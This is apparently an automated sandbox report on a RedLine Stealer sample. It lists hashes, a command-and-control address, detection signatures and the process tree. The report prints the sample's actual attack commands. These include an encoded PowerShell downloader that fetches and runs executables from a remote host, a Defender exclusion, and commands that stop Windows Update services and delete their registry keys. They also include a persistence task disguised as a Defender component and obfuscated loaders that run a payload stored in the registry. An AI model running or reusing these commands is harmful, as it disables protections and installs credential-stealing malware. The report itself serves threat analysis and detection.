Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
55s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
16/01/2023, 07:08
Static task
static1
Behavioral task
behavioral1
Sample
77d29818be0d01c38545baa0bd4551c6853c224b.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
77d29818be0d01c38545baa0bd4551c6853c224b.exe
Resource
win10v2004-20220901-en
General
-
Target
77d29818be0d01c38545baa0bd4551c6853c224b.exe
-
Size
365KB
-
MD5
343adbd49e24d1bdec30f634f4055da8
-
SHA1
77d29818be0d01c38545baa0bd4551c6853c224b
-
SHA256
404c51dbba49787d8c3d9cde78efc1a5eb0d9f139c0c6b130438870a0ecc244c
-
SHA512
4c6831539aef807c7cb4875306e5fecc06b769924e0a1f80a5316f194a5235ec9e904c932b3ec4021e7ef2237bc2dba3db47a8a1cb20244c67c9fa1e6d88298f
-
SSDEEP
6144:SVjDF2Bp0G3LkjLsvBrL0+ecB4X0Y37cWI+HLq11aWBLXAO1DAjWbc:SRDF2BpjLQLsvBP0+ecyEY37C8P
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/memory/816-79-0x0000000000080000-0x00000000000A0000-memory.dmp family_redline behavioral1/memory/816-84-0x000000000009ADAE-mapping.dmp family_redline behavioral1/memory/816-85-0x0000000000080000-0x00000000000A0000-memory.dmp family_redline behavioral1/memory/816-86-0x0000000000080000-0x00000000000A0000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1648 created 1400 1648 SmartDefRun.exe 10 PID 1648 created 1400 1648 SmartDefRun.exe 10 PID 1648 created 1400 1648 SmartDefRun.exe 10 PID 1648 created 1400 1648 SmartDefRun.exe 10 PID 1644 created 412 1644 powershell.EXE 3 -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 1152 powershell.exe 5 1152 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 3 IoCs
pid Process 2032 new2.exe 972 SysApp.exe 1648 SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 7 IoCs
pid Process 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 1632 WerFault.exe 1632 WerFault.exe 1632 WerFault.exe 1152 powershell.exe -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1816 set thread context of 1068 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 28 PID 2032 set thread context of 816 2032 new2.exe 35 PID 1648 set thread context of 832 1648 SmartDefRun.exe 56 PID 1644 set thread context of 1876 1644 powershell.EXE 62 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 988 sc.exe 1188 sc.exe 1996 sc.exe 1036 sc.exe 436 sc.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 1472 1816 WerFault.exe 26 1632 2032 WerFault.exe 32 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 824 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a0bd1fef7a29d901 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 972 SysApp.exe 972 SysApp.exe 972 SysApp.exe 972 SysApp.exe 972 SysApp.exe 816 vbc.exe 1648 SmartDefRun.exe 1648 SmartDefRun.exe 1988 powershell.exe 1648 SmartDefRun.exe 1648 SmartDefRun.exe 1648 SmartDefRun.exe 1648 SmartDefRun.exe 552 powershell.exe 1648 SmartDefRun.exe 1648 SmartDefRun.exe 1644 powershell.EXE 1348 powershell.EXE 1644 powershell.EXE 1876 dllhost.exe 1876 dllhost.exe 1876 dllhost.exe 1876 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1152 powershell.exe Token: SeDebugPrivilege 816 vbc.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 552 powershell.exe Token: SeDebugPrivilege 1644 powershell.EXE Token: SeDebugPrivilege 1348 powershell.EXE Token: SeDebugPrivilege 1644 powershell.EXE Token: SeDebugPrivilege 1876 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1816 wrote to memory of 1068 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 28 PID 1816 wrote to memory of 1068 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 28 PID 1816 wrote to memory of 1068 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 28 PID 1816 wrote to memory of 1068 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 28 PID 1816 wrote to memory of 1068 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 28 PID 1816 wrote to memory of 1068 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 28 PID 1816 wrote to memory of 1472 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 29 PID 1816 wrote to memory of 1472 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 29 PID 1816 wrote to memory of 1472 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 29 PID 1816 wrote to memory of 1472 1816 77d29818be0d01c38545baa0bd4551c6853c224b.exe 29 PID 1068 wrote to memory of 1152 1068 vbc.exe 30 PID 1068 wrote to memory of 1152 1068 vbc.exe 30 PID 1068 wrote to memory of 1152 1068 vbc.exe 30 PID 1068 wrote to memory of 1152 1068 vbc.exe 30 PID 1152 wrote to memory of 2032 1152 powershell.exe 32 PID 1152 wrote to memory of 2032 1152 powershell.exe 32 PID 1152 wrote to memory of 2032 1152 powershell.exe 32 PID 1152 wrote to memory of 2032 1152 powershell.exe 32 PID 1152 wrote to memory of 972 1152 powershell.exe 34 PID 1152 wrote to memory of 972 1152 powershell.exe 34 PID 1152 wrote to memory of 972 1152 powershell.exe 34 PID 1152 wrote to memory of 972 1152 powershell.exe 34 PID 2032 wrote to memory of 816 2032 new2.exe 35 PID 2032 wrote to memory of 816 2032 new2.exe 35 PID 2032 wrote to memory of 816 2032 new2.exe 35 PID 2032 wrote to memory of 816 2032 new2.exe 35 PID 2032 wrote to memory of 816 2032 new2.exe 35 PID 2032 wrote to memory of 816 2032 new2.exe 35 PID 2032 wrote to memory of 1632 2032 new2.exe 36 PID 2032 wrote to memory of 1632 2032 new2.exe 36 PID 2032 wrote to memory of 1632 2032 new2.exe 36 PID 2032 wrote to memory of 1632 2032 new2.exe 36 PID 1152 wrote to memory of 1648 1152 powershell.exe 37 PID 1152 wrote to memory of 1648 1152 powershell.exe 37 PID 1152 wrote to memory of 1648 1152 powershell.exe 37 PID 1152 wrote to memory of 1648 1152 powershell.exe 37 PID 524 wrote to memory of 988 524 cmd.exe 45 PID 524 wrote to memory of 988 524 cmd.exe 45 PID 524 wrote to memory of 988 524 cmd.exe 45 PID 524 wrote to memory of 1188 524 cmd.exe 46 PID 524 wrote to memory of 1188 524 cmd.exe 46 PID 524 wrote to memory of 1188 524 cmd.exe 46 PID 524 wrote to memory of 1996 524 cmd.exe 47 PID 524 wrote to memory of 1996 524 cmd.exe 47 PID 524 wrote to memory of 1996 524 cmd.exe 47 PID 524 wrote to memory of 1036 524 cmd.exe 48 PID 524 wrote to memory of 1036 524 cmd.exe 48 PID 524 wrote to memory of 1036 524 cmd.exe 48 PID 524 wrote to memory of 436 524 cmd.exe 49 PID 524 wrote to memory of 436 524 cmd.exe 49 PID 524 wrote to memory of 436 524 cmd.exe 49 PID 524 wrote to memory of 588 524 cmd.exe 50 PID 524 wrote to memory of 588 524 cmd.exe 50 PID 524 wrote to memory of 588 524 cmd.exe 50 PID 552 wrote to memory of 824 552 powershell.exe 51 PID 552 wrote to memory of 824 552 powershell.exe 51 PID 552 wrote to memory of 824 552 powershell.exe 51 PID 524 wrote to memory of 632 524 cmd.exe 52 PID 524 wrote to memory of 632 524 cmd.exe 52 PID 524 wrote to memory of 632 524 cmd.exe 52 PID 524 wrote to memory of 884 524 cmd.exe 53 PID 524 wrote to memory of 884 524 cmd.exe 53 PID 524 wrote to memory of 884 524 cmd.exe 53 PID 524 wrote to memory of 1488 524 cmd.exe 54
Processes
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:464
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:412
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{7e31582b-bfd1-4ed5-a512-a15f64b92c12}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"C:\Users\Admin\AppData\Local\Temp\77d29818be0d01c38545baa0bd4551c6853c224b.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 366⤵
- Loads dropped DLL
- Program crash
PID:1632
-
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:972
-
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 363⤵
- Program crash
PID:1472
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1188
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1036
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:436
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:588
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:632
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:884
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1488
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:680
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"3⤵
- Creates scheduled task(s)
PID:824
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:832
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {29655853-BBEF-421C-B57B-CCDDCA4AFDBA} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:760
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
464KB
MD5990c8e3fc56a2734631b51fc61a6779a
SHA155a16cc67fc52cdf0690387e083955048106d48a
SHA256d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e
SHA512f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bf66a8f5d2cc433e55f0805b33072c29
SHA1c6bab6877abd18425948b692df00dec8a47af6f2
SHA2560499e8d623afd21f5d5518a01087c33b5a28582f344068c5a4a3be15d91cb571
SHA51215ed38f1dd8bf697b95ec81fce512ed21581ca32dcd1fe2b111757be3c6cd1b94f91013fc1a113cb432067e16639671accfba0acdb03daf4ec8358024f3cf557
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
464KB
MD5990c8e3fc56a2734631b51fc61a6779a
SHA155a16cc67fc52cdf0690387e083955048106d48a
SHA256d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e
SHA512f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5
-
Filesize
464KB
MD5990c8e3fc56a2734631b51fc61a6779a
SHA155a16cc67fc52cdf0690387e083955048106d48a
SHA256d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e
SHA512f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5
-
Filesize
464KB
MD5990c8e3fc56a2734631b51fc61a6779a
SHA155a16cc67fc52cdf0690387e083955048106d48a
SHA256d80ce10659442d8e5b9c28e53bf254711881cf9502f52aeb8abf4a15c9e6e36e
SHA512f5332bcae3242d86a58adf01069c425f5b22bdda9045200fb5b3d9ab3e983d94af8462a04e148b7164e8d6122ec2d198d18081850e00175bb257c0ddb3defdc5
-
Filesize
464KB
MD5990c8e3fc56a2734631b51fc61a6779a
SHA155a16cc67fc52cdf0690387e083955048106d48a
